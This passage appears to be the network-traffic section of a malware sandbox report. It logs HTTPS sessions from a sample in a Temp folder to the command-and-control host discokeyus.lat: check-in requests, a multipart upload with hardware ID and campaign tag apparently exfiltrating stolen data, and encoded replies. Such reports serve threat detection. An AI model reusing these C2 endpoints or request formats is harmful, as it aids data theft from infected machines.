                                                                                                                                                                                                                                                              Data Ascii: CpQr+oq71+FSYtPxxqw+WKI1uflx0zpBo6hHJD7G5bAOQFn6Snrn4PdRMxHkbL9Nw/a9LGG2XvT0PTckP4blsA3gWJoJK7aAokVnwVcoSrigIkw9QCKutTPd1qXd5uCFb2Epy1trV1ElpYZEY2lqGYbnuRyC1npENDxQtdoDhDGKNM37H94DlEZwouFGfS8I0CWvbBGC70RRSScgqgIUMYyEKWpKapbw50H3wtKoTrimQk5NQcJ+NUEtAVUuopE
                                                                                                                                                                                                                                                              2024-12-22 01:17:59 UTC1369INData Raw: 53 72 50 47 32 63 67 4e 6a 43 43 6f 4a 4b 4d 7a 77 30 43 5a 61 37 2f 77 65 4c 2b 4e 59 42 4a 73 55 5a 4b 42 67 51 30 2b 78 57 71 62 6a 39 66 68 47 54 53 51 41 66 45 6f 6b 38 66 44 45 4d 6d 50 48 78 6c 38 42 78 33 67 35 33 78 35 44 39 57 77 33 52 2b 45 54 6c 4b 36 78 2b 44 64 44 59 6c 68 6b 51 69 71 45 39 39 74 38 50 49 47 46 53 58 79 33 46 56 50 50 4c 51 72 35 62 68 55 41 71 56 44 52 34 36 2f 34 49 55 4d 6a 47 79 34 41 59 73 66 6c 79 58 74 61 37 2f 41 63 4c 75 56 55 45 34 6f 39 65 74 34 37 41 45 37 2f 42 59 6d 79 2f 66 59 35 44 43 52 41 42 56 49 73 68 4d 79 45 66 48 79 52 6a 31 49 63 35 30 77 4e 6d 69 52 56 72 51 6b 4e 52 2f 41 55 6a 37 53 79 2b 44 64 44 59 6c 68 6b 51 43 71 45 39 39 74 38 50 49 47 46 53 58 79 33 46 56 50 50 4c 51 72 35 62 68 55 41 71 56
                                                                                                                                                                                                                                                              Data Ascii: SrPG2cgNjCCoJKMzw0CZa7/weL+NYBJsUZKBgQ0+xWqbj9fhGTSQAfEok8fDEMmPHxl8Bx3g53x5D9Ww3R+ETlK6x+DdDYlhkQiqE99t8PIGFSXy3FVPPLQr5bhUAqVDR46/4IUMjGy4AYsflyXta7/AcLuVUE4o9et47AE7/BYmy/fY5DCRABVIshMyEfHyRj1Ic50wNmiRVrQkNR/AUj7Sy+DdDYlhkQCqE99t8PIGFSXy3FVPPLQr5bhUAqV
                                                                                                                                                                                                                                                              2024-12-22 01:17:59 UTC1369INData Raw: 76 7a 73 6a 59 77 34 2f 55 69 71 45 2f 34 70 6b 4a 4e 44 64 41 69 54 72 52 55 2b 61 4b 45 4f 67 59 45 4e 4f 73 56 72 66 6f 72 65 6f 64 41 78 6a 56 44 6f 63 61 6f 54 73 68 43 55 6b 78 35 64 4b 65 71 6f 43 45 64 31 71 42 4b 63 74 45 56 4c 33 41 59 6d 67 2b 6f 5a 48 4c 6e 59 66 4c 42 45 6d 39 66 37 4f 4b 6e 48 53 78 78 55 58 32 6d 38 52 6d 69 4a 48 6f 68 38 56 51 2f 45 4d 6d 4f 50 7a 2b 47 46 44 50 46 67 52 41 47 50 55 38 49 70 79 4a 4e 32 58 53 6d 6e 70 55 41 53 4e 4d 51 6a 6e 4e 41 51 41 37 6b 79 47 34 36 76 34 49 56 41 71 57 43 35 53 50 49 53 30 78 44 46 6c 30 74 6b 52 4f 2f 5a 45 41 49 73 78 41 39 34 51 4c 6c 4c 32 45 70 7a 68 6a 4c 56 39 46 58 45 62 4c 42 56 61 2b 74 37 59 4f 33 54 53 6c 54 34 75 36 55 34 39 6f 77 56 56 35 7a 35 42 5a 76 49 55 6e 4f 50
                                                                                                                                                                                                                                                              Data Ascii: vzsjYw4/UiqE/4pkJNDdAiTrRU+aKEOgYENOsVrforeodAxjVDocaoTshCUkx5dKeqoCEd1qBKctEVL3AYmg+oZHLnYfLBEm9f7OKnHSxxUX2m8RmiJHoh8VQ/EMmOPz+GFDPFgRAGPU8IpyJN2XSmnpUASNMQjnNAQA7kyG46v4IVAqWC5SPIS0xDFl0tkRO/ZEAIsxA94QLlL2EpzhjLV9FXEbLBVa+t7YO3TSlT4u6U49owVV5z5BZvIUnOP


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              27192.168.2.450120104.21.21.99443348C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:11 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:11 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                                              2024-12-22 01:18:12 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:12 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=um4oeo9elhg70cllbg1lkfe7np; expires=Wed, 16 Apr 2025 19:04:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4h54KVse2f9E4V7UZ4xRkXTO4TMsbY2qYGXMHT%2FUacCDWoZ5%2Fo9FnQrx%2Ftgssy2pgiuKo3T32BQQl20hYyCSh6xZKfr8vllV0CtMCLZRXBy%2FkiY8NE%2F4lRaRqpSXIMAzYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c46cb09ec8c33-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2105&min_rtt=1981&rtt_var=991&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=905&delivery_rate=981512&cwnd=245&unsent_bytes=0&cid=4ad4cb7dd8f737be&ts=1023&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:12 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                                              2024-12-22 01:18:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              28192.168.2.450125104.21.21.994437012C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:13 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=TQH71NTJ009JG
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 18133
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:13 UTC15331OUTData Raw: 2d 2d 54 51 48 37 31 4e 54 4a 30 30 39 4a 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 54 51 48 37 31 4e 54 4a 30 30 39 4a 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 51 48 37 31 4e 54 4a 30 30 39 4a 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 54 51 48 37 31 4e 54 4a 30 30 39
                                                                                                                                                                                                                                                              Data Ascii: --TQH71NTJ009JGContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--TQH71NTJ009JGContent-Disposition: form-data; name="pid"2--TQH71NTJ009JGContent-Disposition: form-data; name="lid"PsFKDg--pablo--TQH71NTJ009
                                                                                                                                                                                                                                                              2024-12-22 01:18:13 UTC2802OUTData Raw: 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc
                                                                                                                                                                                                                                                              Data Ascii: u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
                                                                                                                                                                                                                                                              2024-12-22 01:18:14 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:14 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=9qn8vs55t06mdb9tnchfsg68vc; expires=Wed, 16 Apr 2025 19:04:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3j3OWsAIDjxM02ttKYmzLjxvgksZFWjx%2BETWjrHuJSYHkf4RlNU7W7qMJ7uyhrUJIW58LqRA0dcgq9UPnYHvmrvqV5mdYzO5%2BNCJ6adwZ3a%2FvTL1%2FMhDg7IGE2Kx4xkgQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c46d6da84729e-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2033&min_rtt=2025&rtt_var=776&sent=17&recv=21&lost=0&retrans=0&sent_bytes=2833&recv_bytes=19088&delivery_rate=1396461&cwnd=165&unsent_bytes=0&cid=3d746de4edc4f9f1&ts=881&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:18:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              29192.168.2.450128104.21.21.99443348C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:18:13 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 47
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:18:13 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                                              2024-12-22 01:18:14 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:18:14 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=lucqojs1nnbrce2pu7sa56sc61; expires=Wed, 16 Apr 2025 19:04:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=674IIAwVWtT7RZ40Tq4EQyZK61DMhvk62S%2B%2BsZ502BFXZtNYUjfLW9GaYRSZgflmiJ2nr%2BNvQv4rdhg68NDhdov5Ir0DNlYU7OUb4iUCb8JTM2EINk%2F6GQPoIxUiFoDpQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c46d98c944392-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1698&rtt_var=641&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=945&delivery_rate=1719670&cwnd=234&unsent_bytes=0&cid=f4835c41603a4726&ts=780&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:18:14 UTC242INData Raw: 31 63 62 66 0d 0a 6b 51 56 35 64 76 4e 6c 66 58 44 56 4e 51 67 44 4e 6d 54 30 43 4a 37 66 6a 78 6d 44 47 52 67 4b 35 52 73 4c 32 72 30 2f 51 61 37 71 4a 77 39 55 79 56 46 52 55 71 5a 51 4b 6a 6c 43 46 6f 46 74 73 76 33 75 66 61 45 6a 66 6d 75 4a 61 47 37 32 6e 30 6b 73 6a 4b 74 6a 47 42 71 41 41 46 46 53 73 45 30 71 4f 57 30 66 31 6d 33 77 2f 62 55 37 35 6e 4e 36 61 34 6c 35 61 72 48 53 54 79 33 4e 2b 57 6b 65 48 70 59 47 47 52 47 35 57 47 31 6d 55 77 57 65 5a 76 65 79 35 33 53 68 4e 54 70 76 6e 7a 6b 78 2b 50 42 61 4e 63 2f 63 5a 41 6f 64 30 52 68 52 43 2f 64 51 5a 69 45 4d 52 70 56 74 2f 4c 50 70 66 65 68 78 63 47 4b 42 65 47 2b 77 7a 56 59 6e 78 76 6c 6e 48 52 2b 63 44 77 30 63 73 31 39 6d 59 46 6b 46 31 69 53 38
                                                                                                                                                                                                                                                              Data Ascii: 1cbfkQV5dvNlfXDVNQgDNmT0CJ7fjxmDGRgK5RsL2r0/Qa7qJw9UyVFRUqZQKjlCFoFtsv3ufaEjfmuJaG72n0ksjKtjGBqAAFFSsE0qOW0f1m3w/bU75nN6a4l5arHSTy3N+WkeHpYGGRG5WG1mUwWeZvey53ShNTpvnzkx+PBaNc/cZAod0RhRC/dQZiEMRpVt/LPpfehxcGKBeG+wzVYnxvlnHR+cDw0cs19mYFkF1iS8
                                                                                                                                                                                                                                                              2024-12-22 01:18:14 UTC1369INData Raw: 75 76 55 37 75 54 73 70 57 6f 52 6f 65 4b 33 53 54 53 57 4d 37 43 6b 43 56 4a 59 4c 58 30 72 33 58 32 5a 76 55 51 57 5a 62 66 32 39 2f 33 54 68 65 48 4a 67 67 33 4e 6d 74 39 42 54 4b 63 76 37 62 68 77 62 6c 67 38 5a 48 62 51 58 4a 43 46 54 48 74 59 79 76 4a 33 39 65 4f 4a 76 64 33 6e 48 5a 69 65 68 6e 31 6f 76 6a 4b 73 6e 48 52 71 51 43 68 38 41 76 31 78 68 5a 45 59 4e 6e 32 66 78 76 65 42 78 37 6e 68 36 62 34 31 7a 5a 72 4c 62 55 43 37 4b 38 32 64 62 57 74 45 41 42 31 4c 76 46 30 6c 6b 52 41 47 61 66 4c 36 48 72 57 53 76 59 6a 70 76 69 7a 6b 78 2b 4e 64 59 49 4d 2f 34 61 42 67 63 6d 68 55 66 41 4c 46 61 62 33 4e 53 41 35 68 67 2f 36 2f 6e 64 65 64 34 63 32 4f 4f 66 47 36 38 6e 78 4e 6a 79 2b 73 6e 51 31 53 77 43 68 51 65 76 55 42 71 49 55 74 49 6a 79 72
                                                                                                                                                                                                                                                              Data Ascii: uvU7uTspWoRoeK3STSWM7CkCVJYLX0r3X2ZvUQWZbf29/3TheHJgg3Nmt9BTKcv7bhwblg8ZHbQXJCFTHtYyvJ39eOJvd3nHZiehn1ovjKsnHRqQCh8Av1xhZEYNn2fxveBx7nh6b41zZrLbUC7K82dbWtEAB1LvF0lkRAGafL6HrWSvYjpvizkx+NdYIM/4aBgcmhUfALFab3NSA5hg/6/nded4c2OOfG68nxNjy+snQ1SwChQevUBqIUtIjyr
                                                                                                                                                                                                                                                              2024-12-22 01:18:14 UTC1369INData Raw: 65 64 30 64 32 54 48 4e 79 6d 2f 78 78 31 37 6a 4e 6c 6b 44 78 65 62 52 53 6f 52 75 56 6c 74 64 78 51 5a 32 48 4f 38 75 75 45 37 75 54 74 33 61 59 39 2f 65 37 66 53 58 69 33 43 2f 47 49 55 48 4a 45 48 45 68 65 7a 58 47 46 69 57 51 4b 45 59 50 79 31 36 48 72 72 63 54 6f 6d 78 33 35 78 2b 49 63 64 45 74 76 34 4a 53 34 58 6e 77 6b 59 42 50 64 49 4a 48 67 55 41 5a 6f 71 70 50 33 67 63 2b 52 2b 64 57 6d 4e 64 32 79 79 30 31 55 74 7a 2b 46 6f 48 78 53 64 44 78 55 66 75 56 4e 69 61 46 38 4e 6b 47 72 39 74 36 30 31 6f 58 78 69 4b 4e 38 35 58 62 2f 54 55 43 79 4f 78 6d 51 56 47 70 59 52 58 77 33 35 54 69 70 6d 57 45 62 4f 4b 76 43 30 37 58 44 72 66 33 70 76 69 6e 78 71 76 39 78 51 4a 4d 62 39 59 42 38 59 6d 41 6f 5a 45 72 42 54 62 33 4e 52 44 35 70 6d 76 50 4f 74
                                                                                                                                                                                                                                                              Data Ascii: ed0d2THNym/xx17jNlkDxebRSoRuVltdxQZ2HO8uuE7uTt3aY9/e7fSXi3C/GIUHJEHEhezXGFiWQKEYPy16HrrcTomx35x+IcdEtv4JS4XnwkYBPdIJHgUAZoqpP3gc+R+dWmNd2yy01Utz+FoHxSdDxUfuVNiaF8NkGr9t601oXxiKN85Xb/TUCyOxmQVGpYRXw35TipmWEbOKvC07XDrf3pvinxqv9xQJMb9YB8YmAoZErBTb3NRD5pmvPOt
                                                                                                                                                                                                                                                              2024-12-22 01:18:14 UTC1369INData Raw: 52 78 78 33 35 6c 2b 49 63 64 4b 73 58 68 61 52 55 64 6e 41 45 58 46 62 6c 61 59 57 64 66 41 5a 46 73 38 62 58 67 66 75 4a 36 66 6d 4b 56 65 6d 4b 79 30 6c 64 6a 67 72 4e 67 41 31 54 4a 52 7a 67 65 6e 6b 64 78 63 30 4a 47 69 53 54 6c 2f 65 70 33 6f 53 4d 36 61 34 68 77 5a 72 44 58 55 69 7a 49 2f 57 45 64 47 5a 51 49 46 51 43 2f 57 57 64 71 57 77 32 45 61 76 47 35 34 58 2f 70 63 48 41 6f 79 54 6c 75 6f 4a 38 46 59 2f 6e 2b 61 42 73 58 68 30 63 41 58 4b 34 58 62 57 30 55 58 74 5a 6d 38 72 33 69 64 2b 31 77 63 6d 6d 4c 64 32 36 39 31 6c 55 72 33 76 4a 6a 45 78 57 66 43 42 34 57 73 6c 4a 75 5a 6c 41 41 6d 53 71 79 2f 65 70 6a 6f 53 4d 36 52 36 42 4d 4b 35 6e 6c 48 54 79 43 36 69 63 63 47 4e 46 66 58 78 36 30 57 32 4a 75 55 67 2b 61 59 50 57 32 34 58 44 6c 64
                                                                                                                                                                                                                                                              Data Ascii: Rxx35l+IcdKsXhaRUdnAEXFblaYWdfAZFs8bXgfuJ6fmKVemKy0ldjgrNgA1TJRzgenkdxc0JGiSTl/ep3oSM6a4hwZrDXUizI/WEdGZQIFQC/WWdqWw2EavG54X/pcHAoyTluoJ8FY/n+aBsXh0cAXK4XbW0UXtZm8r3id+1wcmmLd2691lUr3vJjExWfCB4WslJuZlAAmSqy/epjoSM6R6BMK5nlHTyC6iccGNFfXx60W2JuUg+aYPW24XDld
                                                                                                                                                                                                                                                              2024-12-22 01:18:14 UTC1369INData Raw: 32 61 4c 6e 5a 54 79 54 46 34 57 6b 57 47 35 6b 50 46 68 4f 7a 55 6d 64 6e 57 41 79 58 62 66 4b 7a 35 54 75 76 4f 33 31 77 78 79 45 70 6d 63 39 47 4d 64 72 2b 52 68 59 62 30 52 68 52 43 2f 64 51 5a 69 45 4d 52 70 39 34 2b 4c 44 2f 63 75 5a 31 64 57 75 56 65 47 53 7a 7a 56 6f 73 79 50 52 72 48 52 75 58 42 68 6f 59 75 31 42 76 61 6c 73 4b 31 69 53 38 75 76 55 37 75 54 74 55 59 35 52 75 61 72 62 55 53 7a 69 4d 37 43 6b 43 56 4a 59 4c 58 30 72 33 56 47 46 71 55 41 61 61 61 76 69 77 37 57 6e 75 66 48 31 68 6a 47 74 6a 76 39 68 57 4b 38 66 38 59 51 6b 59 6e 78 55 61 41 4b 55 58 4a 43 46 54 48 74 59 79 76 49 76 71 61 2f 46 34 4f 46 6d 52 65 6e 2b 7a 30 6c 46 6a 30 37 31 2b 57 78 4f 64 52 30 64 53 73 56 68 6a 59 6c 73 48 6e 32 62 78 75 4f 52 2b 34 48 31 2b 59 6f
                                                                                                                                                                                                                                                              Data Ascii: 2aLnZTyTF4WkWG5kPFhOzUmdnWAyXbfKz5TuvO31wxyEpmc9GMdr+RhYb0RhRC/dQZiEMRp94+LD/cuZ1dWuVeGSzzVosyPRrHRuXBhoYu1BvalsK1iS8uvU7uTtUY5RuarbUSziM7CkCVJYLX0r3VGFqUAaaaviw7WnufH1hjGtjv9hWK8f8YQkYnxUaAKUXJCFTHtYyvIvqa/F4OFmRen+z0lFj071+WxOdR0dSsVhjYlsHn2bxuOR+4H1+Yo
                                                                                                                                                                                                                                                              2024-12-22 01:18:14 UTC1369INData Raw: 6e 30 4a 74 31 62 4e 67 46 31 54 4a 52 78 77 56 74 46 5a 67 61 46 67 4a 6b 57 37 75 74 2b 70 70 34 48 70 78 5a 59 74 35 5a 4c 58 56 58 43 72 42 2f 32 6f 63 45 35 34 43 58 31 7a 33 55 48 49 68 44 45 61 33 5a 2f 65 78 74 69 47 68 5a 44 52 78 78 33 35 6c 2b 49 63 64 49 38 62 32 62 52 59 58 6e 67 51 4e 45 37 46 46 61 6d 78 65 46 4a 78 68 2b 62 44 67 64 75 4a 39 66 47 4f 4c 61 32 43 34 33 46 5a 6a 67 72 4e 67 41 31 54 4a 52 7a 77 46 6f 56 31 74 62 55 49 4e 6c 32 6e 71 73 50 30 37 72 7a 74 72 62 35 59 35 4d 61 37 50 53 69 54 54 76 58 35 62 45 35 31 48 52 31 4b 78 58 6d 78 6d 55 67 69 45 62 2f 71 79 34 6e 4c 6f 66 33 4a 72 68 33 31 74 76 39 70 65 4c 38 66 30 5a 42 51 51 6d 41 6b 57 48 66 63 5a 4b 6d 5a 4d 52 73 34 71 33 61 62 75 64 2b 77 37 5a 53 61 65 4f 57 36
                                                                                                                                                                                                                                                              Data Ascii: n0Jt1bNgF1TJRxwVtFZgaFgJkW7ut+pp4HpxZYt5ZLXVXCrB/2ocE54CX1z3UHIhDEa3Z/extiGhZDRxx35l+IcdI8b2bRYXngQNE7FFamxeFJxh+bDgduJ9fGOLa2C43FZjgrNgA1TJRzwFoV1tbUINl2nqsP07rztrb5Y5Ma7PSiTTvX5bE51HR1KxXmxmUgiEb/qy4nLof3Jrh31tv9peL8f0ZBQQmAkWHfcZKmZMRs4q3abud+w7ZSaeOW6
                                                                                                                                                                                                                                                              2024-12-22 01:18:14 UTC280INData Raw: 34 79 72 4a 7a 73 66 68 77 49 59 42 50 56 69 61 57 39 61 41 59 41 71 34 34 4b 6a 4f 2b 35 68 4f 6a 43 2b 59 43 6d 2f 30 78 31 37 6a 4f 5a 67 47 78 4f 4c 45 52 67 65 70 6c 78 6e 62 58 59 4a 6b 58 7a 2f 73 75 35 71 36 44 64 78 5a 63 63 33 4b 62 2f 48 48 58 75 4d 33 47 41 4e 46 37 34 45 44 68 76 33 47 53 70 6d 51 6b 62 4f 4b 73 4c 39 2f 33 6a 78 65 48 56 35 75 54 6b 78 6f 65 45 64 4b 4e 72 30 64 78 67 43 6d 67 6f 54 41 34 6b 58 4d 6a 55 47 56 4d 51 34 72 71 4b 74 5a 4e 34 31 4f 6d 6e 48 49 56 43 68 6e 30 74 6a 6c 4b 45 70 57 77 62 52 58 31 39 56 74 45 56 34 5a 31 63 51 6c 53 33 43 67 38 70 74 36 33 78 71 62 35 42 32 4b 66 61 66 55 6d 4f 55 79 69 63 53 45 34 6f 57 43 52 2b 6e 55 43 70 65 47 6b 61 4f 4b 71 54 39 32 48 6a 76 64 58 31 2b 6c 6a 52 4f 72 74 56 61
                                                                                                                                                                                                                                                              Data Ascii: 4yrJzsfhwIYBPViaW9aAYAq44KjO+5hOjC+YCm/0x17jOZgGxOLERgeplxnbXYJkXz/su5q6DdxZcc3Kb/HHXuM3GANF74EDhv3GSpmQkbOKsL9/3jxeHV5uTkxoeEdKNr0dxgCmgoTA4kXMjUGVMQ4rqKtZN41OmnHIVChn0tjlKEpWwbRX19VtEV4Z1cQlS3Cg8pt63xqb5B2KfafUmOUyicSE4oWCR+nUCpeGkaOKqT92HjvdX1+ljROrtVa
